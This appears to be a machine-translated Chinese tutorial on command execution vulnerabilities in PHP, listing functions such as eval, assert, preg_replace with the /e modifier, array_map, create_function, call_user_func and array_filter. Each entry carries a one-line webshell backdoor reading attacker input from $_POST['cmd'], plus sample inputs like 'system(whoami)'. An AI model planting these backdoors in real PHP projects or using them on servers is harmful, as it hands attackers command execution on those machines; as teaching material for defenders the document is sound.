当前位置：网站首页>Web Security Foundation - Command Execution Vulnerability

Web Security Foundation - Command Execution Vulnerability

2022-07-28 03:49:00 【Kill the celery】

Catalog

Introduction to command execution vulnerability ：

reason ：

harm ：

PHP Code execution functions

7. call_user_func_array

8. array_filter

9. Double quotes

Introduction to command execution vulnerability ：

reason ：

User input is not checked and filtered , The parameters entered by the user are executed as commands by the application . Command Execution Vulnerability refers to the application sometimes needs to call some functions to execute system commands , Such as ：system()、exec()、shell_exec()、eval()、passthru() Such as function , The code does not filter the user controllable parameters , When the user can control the parameters in these functions , You can splice malicious system commands into normal commands , This results in command execution attacks .

harm ：

1. Inherit Web The authority of the service program to execute system commands or read and write files

2. rebound shell, Get permission to the target server

3. Further intranet penetration

PHP Code execution functions

1.eval

In some Programming language in ,eval Is a function that executes a string as an expression and returns a result ; Among others , It executes multiple lines of code as if they were included , Not including eval This line .eval The input of is not necessarily a string ; In languages that support syntactic abstraction （ Such as Lisp） in ,eval The input of will consist of abstract syntactic forms .

Example

<?php @eval($_POST['cmd']);?>

eval() The parameter passed in by the function must be PHP Code , That is to say End of semicolon ;

disadvantages ：eval Function can execute any php Code

2.assert

Assertion function , Used to catch program errors during debugging .

“ Assertion ” In Chinese, it means “ conclude ”、“ To be sure ”, In programming, it refers to the detection of certain hypothetical conditions , If the condition holds, no operation will be carried out , If the condition does not hold, catch this error , And print out the error message , Terminate program execution .
If assertion Is string , It will be assert() treat as PHP Code to execute .

Example ：

<?php @assert($_POST['cmd'])?>

Unwanted It ends with a semicolon

3. preg_replace

preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

preg_replace — Perform a regular expression search and replace

<?php
preg_replace("/test/e",$_POST["cmd"],"just test");
?>

//preg_replace(' Regular rule ',' Replace character ',' Target character ')

//PCRE Modifier e：preg_replace() After the backward reference replacement of the replacement string ,

// Replace the string as php Code evaluation execution (eval Function mode ), And use the execution result as the real

String involved in replacement

4. array_map

array_map ( callable $callback , array $array1 [, array $... ]
)

Apply a function to each value in the array , Each value is multiplied by itself , And returns an array with new values

Each element of the array applies a callback function

<?php
$func=$_GET['func'];
$cmd=$_POST['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
echo $new_array;
//array_map() Function to apply a user-defined function to each value in the array , And return to user-defined
Array with new value after the action of semantic function .
?>

5. create_function

create_function（ character string $args、 character string $code）： character string

Dynamically create a function from the passed parameters , And return a unique name for it .

<?php
$func = create_function('',$_POST['cmd']);$func();
// Create anonymous function execution code
?>

6. call_user_

call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )

call_user_func — Call the first parameter as a callback function

<?php
call_user_func("assert",$_POST['cmd']);
// The parameters passed in as assert The parameters of the function
//cmd=system(whoami)
?>

7. call_user_func_array

call_user_func_array(callable $callback, array $args): mixed

Take the first parameter as a callback function （callback） call , Make the parameter array （args） Pass in... For the parameters of the callback function .

<?php
$cmd=$_POST['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
// Pass the passed in parameter to... As the first value of the array assert function
//cmd=system(whoami)
?>

8. array_filter

array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

Use the callback function to filter the elements in the array

array_filter() Function to filter the values in an array with a callback function .

This function passes each key value in the input array to the callback function . If the callback function returns true, Return the current key value in the input array to the result array . Array key names remain the same .

<?php
$cmd=$_POST['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
// Use the callback function to filter the elements in the array ：array_filter( Array , function )
//?func=system
//cmd=whoami
?>